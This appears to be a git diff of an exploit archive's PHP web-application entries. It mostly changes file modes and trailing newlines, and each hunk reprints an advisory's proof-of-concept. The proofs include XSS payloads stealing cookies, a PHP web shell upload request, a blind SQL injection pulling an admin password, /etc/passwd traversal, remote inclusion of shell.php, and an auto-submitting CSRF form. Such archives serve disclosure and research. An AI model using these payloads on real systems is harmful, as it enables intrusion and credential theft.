a/platforms/php/webapps/38163.txt b/platforms/php/webapps/38163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38166.txt b/platforms/php/webapps/38166.txt old mode 100755 new mode 100644 index 7d92883dd..27894817d --- a/platforms/php/webapps/38166.txt +++ b/platforms/php/webapps/38166.txt @@ -6,4 +6,4 @@ Attackers can exploit this vulnerability to gain administrative access to the af WHMCS 5.0 and 5.1 are vulnerable; other versions may also be affected. -http://www.example.com/whmcs/admin/login.php?correct&cache=1?login=getpost{} \ No newline at end of file +http://www.example.com/whmcs/admin/login.php?correct&cache=1?login=getpost{} \ No newline at end of file diff --git a/platforms/php/webapps/38167.php b/platforms/php/webapps/38167.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38168.txt b/platforms/php/webapps/38168.txt old mode 100755 new mode 100644 index ae9418441..766d3c367 --- a/platforms/php/webapps/38168.txt +++ b/platforms/php/webapps/38168.txt @@ -12,4 +12,4 @@ Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14 Content-Type: application/x-www-form-urlencoded Content-Length: 195 -module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo '<h1>0wned!</h1><pre>';+echo `ls+-al`; ?> \ No newline at end of file +module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo '<h1>0wned!</h1><pre>';+echo `ls+-al`; ?> \ No newline at end of file diff --git a/platforms/php/webapps/38169.txt b/platforms/php/webapps/38169.txt old mode 100755 new mode 100644 index c827422d2..1a29cbc2c --- a/platforms/php/webapps/38169.txt +++ b/platforms/php/webapps/38169.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML or JavaScript code could run in the context of the affect Havalite CMS 1.1.7 is vulnerable; other versions may also be affected. -http://www.example.com/?p=1 "comment" with value %E2%80%9C%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/?p=1 "comment" with value %E2%80%9C%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/3817.txt b/platforms/php/webapps/3817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38171.txt b/platforms/php/webapps/38171.txt old mode 100755 new mode 100644 index e8150c411..f7dc89781 --- a/platforms/php/webapps/38171.txt +++ b/platforms/php/webapps/38171.txt @@ -9,4 +9,4 @@ Incapsula 1.4.6_b and prior are vulnerable. http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Security.php?token="><script>alert(document.cookie)</script> -http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/38176.txt b/platforms/php/webapps/38176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38178.txt b/platforms/php/webapps/38178.txt old mode 100755 new mode 100644 index 709c1ff2e..5168dce07 --- a/platforms/php/webapps/38178.txt +++ b/platforms/php/webapps/38178.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow NextGEN Gallery 1.9.10 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=[Xss] \ No newline at end of file +http://www.example.com/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=[Xss] \ No newline at end of file diff --git a/platforms/php/webapps/3818.htm b/platforms/php/webapps/3818.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38182.txt b/platforms/php/webapps/38182.txt old mode 100755 new mode 100644 index 9d26a668d..9c8f97df9 --- a/platforms/php/webapps/38182.txt +++ b/platforms/php/webapps/38182.txt @@ -4,4 +4,4 @@ TinyBrowser is prone to multiple vulnerabilities. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) \ No newline at end of file +http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) \ No newline at end of file diff --git a/platforms/php/webapps/38183.txt b/platforms/php/webapps/38183.txt old mode 100755 new mode 100644 index 3053ff0d5..ad027c702 --- a/platforms/php/webapps/38183.txt +++ b/platforms/php/webapps/38183.txt @@ -4,4 +4,4 @@ TinyBrowser is prone to multiple vulnerabilities. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type= \ No newline at end of file +http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type= \ No newline at end of file diff --git a/platforms/php/webapps/38184.txt b/platforms/php/webapps/38184.txt old mode 100755 new mode 100644 index 1a09b252a..498768f93 --- a/platforms/php/webapps/38184.txt +++ b/platforms/php/webapps/38184.txt @@ -4,4 +4,4 @@ TinyBrowser is prone to multiple vulnerabilities. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type= \ No newline at end of file +http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type= \ No newline at end of file diff --git a/platforms/php/webapps/38187.txt b/platforms/php/webapps/38187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38197.txt b/platforms/php/webapps/38197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3820.php b/platforms/php/webapps/3820.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38204.txt b/platforms/php/webapps/38204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38207.txt b/platforms/php/webapps/38207.txt old mode 100755 new mode 100644 index 487278856..4948784f2 --- a/platforms/php/webapps/38207.txt +++ b/platforms/php/webapps/38207.txt @@ -9,4 +9,4 @@ The following products are vulnerable: Quick.Cms 5.0 Quick.Cart 6.0 -http://www.example.com/admin.php/')"></select><script>alert(document.cookie);</script>/ \ No newline at end of file +http://www.example.com/admin.php/')"></select><script>alert(document.cookie);</script>/ \ No newline at end of file diff --git a/platforms/php/webapps/38209.txt b/platforms/php/webapps/38209.txt old mode 100755 new mode 100644 index 061809e47..13398c564 --- a/platforms/php/webapps/38209.txt +++ b/platforms/php/webapps/38209.txt @@ -6,4 +6,4 @@ Remote attackers can exploit this issue to read arbitrary files. This may lead t Gallery 3.8.3 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR] \ No newline at end of file +http://www.example.com/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR] \ No newline at end of file diff --git a/platforms/php/webapps/38210.txt b/platforms/php/webapps/38210.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38213.txt b/platforms/php/webapps/38213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38223.txt b/platforms/php/webapps/38223.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38224.txt b/platforms/php/webapps/38224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38228.txt b/platforms/php/webapps/38228.txt old mode 100755 new mode 100644 index 1644d0130..ef7a6aa37 --- a/platforms/php/webapps/38228.txt +++ b/platforms/php/webapps/38228.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc phpLiteAdmin 1.8.x and 1.9.x are vulnerable. -http://www.example.com/phpliteadmin.php?action=row_view&table=' [ SQLi ] \ No newline at end of file +http://www.example.com/phpliteadmin.php?action=row_view&table=' [ SQLi ] \ No newline at end of file diff --git a/platforms/php/webapps/38229.txt b/platforms/php/webapps/38229.txt old mode 100755 new mode 100644 index f6dc8fadb..95d3c290d --- a/platforms/php/webapps/38229.txt +++ b/platforms/php/webapps/38229.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access IP.Gallery 2.0.5 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?automodule=gallery&cmd=si&img=[SQL] \ No newline at end of file +http://www.example.com/index.php?automodule=gallery&cmd=si&img=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/38231.txt b/platforms/php/webapps/38231.txt old mode 100755 new mode 100644 index d295e4075..2da98adc5 --- a/platforms/php/webapps/38231.txt +++ b/platforms/php/webapps/38231.txt @@ -10,4 +10,4 @@ http://www.example.com/demos/classifiedultra/subclass.php?c=16'[SQLi HERE] Cross-site scripting: -http://www.example.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS HERE] \ No newline at end of file +http://www.example.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS HERE] \ No newline at end of file diff --git a/platforms/php/webapps/38234.txt b/platforms/php/webapps/38234.txt old mode 100755 new mode 100644 index d284467b5..df92306b1 --- a/platforms/php/webapps/38234.txt +++ b/platforms/php/webapps/38234.txt @@ -6,4 +6,4 @@ Successful exploits may allow the attacker to bypass authentication and gain acc DigiLIBE 3.4 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/configuration/general_configuration.html \ No newline at end of file +http://www.example.com/[path]/configuration/general_configuration.html \ No newline at end of file diff --git a/platforms/php/webapps/38236.txt b/platforms/php/webapps/38236.txt old mode 100755 new mode 100644 index 02f99f2c3..d1ae6a753 --- a/platforms/php/webapps/38236.txt +++ b/platforms/php/webapps/38236.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow gpEasy CMS 3.5.2 and prior versions are vulnerable. -http://www.example.com//?cmd=new_section&section=%22%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com//?cmd=new_section&section=%22%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/38237.txt b/platforms/php/webapps/38237.txt old mode 100755 new mode 100644 index 74b92427b..316b59be5 --- a/platforms/php/webapps/38237.txt +++ b/platforms/php/webapps/38237.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to cause denial-of-service conditions, upl http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1 http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 -http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php \ No newline at end of file +http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php \ No newline at end of file diff --git a/platforms/php/webapps/38238.txt b/platforms/php/webapps/38238.txt old mode 100755 new mode 100644 index 8778144f5..66ae008e5 --- a/platforms/php/webapps/38238.txt +++ b/platforms/php/webapps/38238.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHPWeby Free directory script 1.2 is vulnerable; other versions may also be affected. -fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST \ No newline at end of file +fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST \ No newline at end of file diff --git a/platforms/php/webapps/3824.txt b/platforms/php/webapps/3824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38241.txt b/platforms/php/webapps/38241.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38246.txt b/platforms/php/webapps/38246.txt old mode 100755 new mode 100644 index 734a06e13..fd3335ee6 --- a/platforms/php/webapps/38246.txt +++ b/platforms/php/webapps/38246.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access iCart Pro 4.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/forum/icart.php?do=editproduct&productid=19&section=' \ No newline at end of file +http://www.example.com/forum/icart.php?do=editproduct&productid=19&section=' \ No newline at end of file diff --git a/platforms/php/webapps/3825.txt b/platforms/php/webapps/3825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38251.txt b/platforms/php/webapps/38251.txt old mode 100755 new mode 100644 index 48f177b4d..2b732ceca --- a/platforms/php/webapps/38251.txt +++ b/platforms/php/webapps/38251.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WP-Table Reloaded versions prior to 1.9.4 are vulnerable. -http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}// \ No newline at end of file +http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}// \ No newline at end of file diff --git a/platforms/php/webapps/38255.txt b/platforms/php/webapps/38255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3827.txt b/platforms/php/webapps/3827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3828.txt b/platforms/php/webapps/3828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38290.txt b/platforms/php/webapps/38290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38291.txt b/platforms/php/webapps/38291.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38292.txt b/platforms/php/webapps/38292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38294.txt b/platforms/php/webapps/38294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38295.txt b/platforms/php/webapps/38295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38296.txt b/platforms/php/webapps/38296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38297.txt b/platforms/php/webapps/38297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38300.txt b/platforms/php/webapps/38300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38301.txt b/platforms/php/webapps/38301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38309.txt b/platforms/php/webapps/38309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38311.txt b/platforms/php/webapps/38311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38314.txt b/platforms/php/webapps/38314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38315.txt b/platforms/php/webapps/38315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3832.txt b/platforms/php/webapps/3832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38320.txt b/platforms/php/webapps/38320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38321.txt b/platforms/php/webapps/38321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38322.txt b/platforms/php/webapps/38322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38323.txt b/platforms/php/webapps/38323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38324.txt b/platforms/php/webapps/38324.txt old mode 100755 new mode 100644 index 44edc7b88..44de1d536 --- a/platforms/php/webapps/38324.txt +++ b/platforms/php/webapps/38324.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Pretty Link 1.6.3 are vulnerable. -http://www.example.com/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})() \ No newline at end of file +http://www.example.com/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})() \ No newline at end of file diff --git a/platforms/php/webapps/38326.txt b/platforms/php/webapps/38326.txt old mode 100755 new mode 100644 index 48a6362c7..9b4de9381 --- a/platforms/php/webapps/38326.txt +++ b/platforms/php/webapps/38326.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Zenphoto 1.4.4.1 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?rss=undefined+and+1%3D0&lang=en[Blind SQL Injection] \ No newline at end of file +http://www.example.com/index.php?rss=undefined+and+1%3D0&lang=en[Blind SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/38327.txt b/platforms/php/webapps/38327.txt old mode 100755 new mode 100644 index a6ca2be7b..aa3ecb454 --- a/platforms/php/webapps/38327.txt +++ b/platforms/php/webapps/38327.txt @@ -10,4 +10,4 @@ http://www.www.example.com/_conf/?action=statistics&filename=2011.10"><script>al http://www.www.example.com/_conf/?action=delsettings&group="><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee> -http://www.example.com/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&picdir=Sample_Gallery&what=descriptions \ No newline at end of file +http://www.example.com/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&picdir=Sample_Gallery&what=descriptions \ No newline at end of file diff --git a/platforms/php/webapps/38328.txt b/platforms/php/webapps/38328.txt old mode 100755 new mode 100644 index 2568da15b..e4d4af4be --- a/platforms/php/webapps/38328.txt +++ b/platforms/php/webapps/38328.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow OpenEMR 4.1.1 is vulnerable; other versions may also be affected. -http://www.example.com/openemr/[DIR]/[SCRIPT]?site="><script>alert(1);</script> \ No newline at end of file +http://www.example.com/openemr/[DIR]/[SCRIPT]?site="><script>alert(1);</script> \ No newline at end of file diff --git a/platforms/php/webapps/38329.txt b/platforms/php/webapps/38329.txt old mode 100755 new mode 100644 index 782bab102..56e72873f --- a/platforms/php/webapps/38329.txt +++ b/platforms/php/webapps/38329.txt @@ -16,4 +16,4 @@ http://www.example.com/path/dataTables/extras/TableTools/media/swf/ZeroClipboard http://www.example.com/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height -http://www.example.com/www.example.coms/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height \ No newline at end of file +http://www.example.com/www.example.coms/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height \ No newline at end of file diff --git a/platforms/php/webapps/38331.txt b/platforms/php/webapps/38331.txt old mode 100755 new mode 100644 index 21fc7bbe3..113d4babb --- a/platforms/php/webapps/38331.txt +++ b/platforms/php/webapps/38331.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link -https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29 \ No newline at end of file +https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29 \ No newline at end of file diff --git a/platforms/php/webapps/38332.txt b/platforms/php/webapps/38332.txt old mode 100755 new mode 100644 index 294f0a970..b0e2b65d4 --- a/platforms/php/webapps/38332.txt +++ b/platforms/php/webapps/38332.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Batavi 1.2.2 is vulnerable; other versions may also be affected. -<root>/admin/index.php?file_manager&file_manager&"><script>alert(123)</script></a><a href=" \ No newline at end of file +<root>/admin/index.php?file_manager&file_manager&"><script>alert(123)</script></a><a href=" \ No newline at end of file diff --git a/platforms/php/webapps/38333.txt b/platforms/php/webapps/38333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38335.txt b/platforms/php/webapps/38335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38339.txt b/platforms/php/webapps/38339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3834.php b/platforms/php/webapps/3834.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38345.txt b/platforms/php/webapps/38345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3835.txt b/platforms/php/webapps/3835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38354.txt b/platforms/php/webapps/38354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38355.txt b/platforms/php/webapps/38355.txt old mode 100755 new mode 100644 index eb913862a..26600caca --- a/platforms/php/webapps/38355.txt +++ b/platforms/php/webapps/38355.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Uploader 1.0.4 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E \ No newline at end of file +http://www.example.com/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/38359.txt b/platforms/php/webapps/38359.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38363.txt b/platforms/php/webapps/38363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38367.txt b/platforms/php/webapps/38367.txt old mode 100755 new mode 100644 index a5a998653..6972ac7ed --- a/platforms/php/webapps/38367.txt +++ b/platforms/php/webapps/38367.txt @@ -4,4 +4,4 @@ Your Own Classifieds is prone to a cross-site scripting vulnerability because it An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E \ No newline at end of file +http://www.example.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E \ No newline at end of file diff --git a/platforms/php/webapps/3837.txt b/platforms/php/webapps/3837.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38372.html b/platforms/php/webapps/38372.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38373.txt b/platforms/php/webapps/38373.txt old mode 100755 new mode 100644 index d2a3dbbb1..3b5c2cb17 --- a/platforms/php/webapps/38373.txt +++ b/platforms/php/webapps/38373.txt @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- -</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> \ No newline at end of file +</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> \ No newline at end of file diff --git a/platforms/php/webapps/38374.txt b/platforms/php/webapps/38374.txt old mode 100755 new mode 100644 index 64b8d6339..51b0ebf12 --- a/platforms/php/webapps/38374.txt +++ b/platforms/php/webapps/38374.txt @@ -10,4 +10,4 @@ http://www.example.com/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo. Cross-site scripting: -http://www.example.com/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E \ No newline at end of file +http://www.example.com/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E \ No newline at end of file diff --git a/platforms/php/webapps/38375.txt b/platforms/php/webapps/38375.txt old mode 100755 new mode 100644 index 6c8b9253d..a1e319716 --- a/platforms/php/webapps/38375.txt +++ b/platforms/php/webapps/38375.txt @@ -4,4 +4,4 @@ Asteriskguru Queue Statistics is prone to an cross-site scripting vulnerability An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/public/error.php?warning=<XSS injection> \ No newline at end of file +http://www.example.com/public/error.php?warning=<XSS injection> \ No newline at end of file diff --git a/platforms/php/webapps/38376.txt b/platforms/php/webapps/38376.txt old mode 100755 new mode 100644 index 91607c0be..d0b29c7d6 --- a/platforms/php/webapps/38376.txt +++ b/platforms/php/webapps/38376.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow podPress 8.8.10.13 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}// \ No newline at end of file +http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}// \ No newline at end of file diff --git a/platforms/php/webapps/38377.txt b/platforms/php/webapps/38377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3838.txt b/platforms/php/webapps/3838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38385.txt b/platforms/php/webapps/38385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38386.txt b/platforms/php/webapps/38386.txt old mode 100755 new mode 100644 index bb474740c..43911aad9 --- a/platforms/php/webapps/38386.txt +++ b/platforms/php/webapps/38386.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to upload arbitrary files in the context of PHPBoost 4.0 is vulnerable; other versions may also be affected. -http://www.example.com/phpboost/user/?url=/../../KedAns \ No newline at end of file +http://www.example.com/phpboost/user/?url=/../../KedAns \ No newline at end of file diff --git a/platforms/php/webapps/3839.txt b/platforms/php/webapps/3839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38391.txt b/platforms/php/webapps/38391.txt old mode 100755 new mode 100644 index 9c06c85d5..ee9257db3 --- a/platforms/php/webapps/38391.txt +++ b/platforms/php/webapps/38391.txt @@ -4,4 +4,4 @@ Petite Annonce is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[path]/annonce/moteur-prix.php?categoriemoteur=1"><script>alert(31337);</script> \ No newline at end of file +http://www.example.com/[path]/annonce/moteur-prix.php?categoriemoteur=1"><script>alert(31337);</script> \ No newline at end of file diff --git a/platforms/php/webapps/38393.html b/platforms/php/webapps/38393.html old mode 100755 new mode 100644 index 204175224..27d22dbac --- a/platforms/php/webapps/38393.html +++ b/platforms/php/webapps/38393.html @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to perform certain unauthorize Occasions 1.0.4 is vulnerable; other versions may also be affected. -<html> <head><title>CSRF Occasions</title></head> <body> <!-- www.example.com:9001/wordpress --> <form action="http://127.0.0.1:9001/wordpress/wp-admin/options-general.php?page=occasions/occasions.php" method="POST"> <input type="hidden" name="action" value="saveoccasions" /> <input type="hidden" name="nodes[]" value="1" /> <input type="hidden" name="occ_title1" value="CSRF Vulnerability" /> <input type="hidden" name="occ_startdate1" value="18.03." /> <input type="hidden" name="occ_enddate1" value="28.03." /> <input type="hidden" name="occ_type1" value="1" /> <input type="hidden" name="occ_content1" value="<script>alert(1)</script>" /> <script>document.forms[0].submit();</script> </form> </body> </html> \ No newline at end of file +<html> <head><title>CSRF Occasions</title></head> <body> <!-- www.example.com:9001/wordpress --> <form action="http://127.0.0.1:9001/wordpress/wp-admin/options-general.php?page=occasions/occasions.php" method="POST"> <input type="hidden" name="action" value="saveoccasions" /> <input type="hidden" name="nodes[]" value="1" /> <input type="hidden" name="occ_title1" value="CSRF Vulnerability" /> <input type="hidden" name="occ_startdate1" value="18.03." /> <input type="hidden" name="occ_enddate1" value="28.03." /> <input type="hidden" name="occ_type1" value="1" /> <input type="hidden" name="occ_content1" value="<script>alert(1)</script>" /> <script>document.forms[0].submit();</script> </form> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/384.txt b/platforms/php/webapps/384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3840.txt b/platforms/php/webapps/3840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38400.txt b/platforms/php/webapps/38400.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38406.txt b/platforms/php/webapps/38406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38407.txt b/platforms/php/webapps/38407.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38408.txt b/platforms/php/webapps/38408.txt old mode 100755 new mode 100644 index 4a6c42157..b50ba5dd8 --- a/platforms/php/webapps/38408.txt +++ b/platforms/php/webapps/38408.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Jaow CMS 2.4.8 is vulnerable; other versions may also be affected. -http://www.example.com/path/add_ons.php?add_ons=[XSS] \ No newline at end of file +http://www.example.com/path/add_ons.php?add_ons=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3841.txt b/platforms/php/webapps/3841.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38410.txt 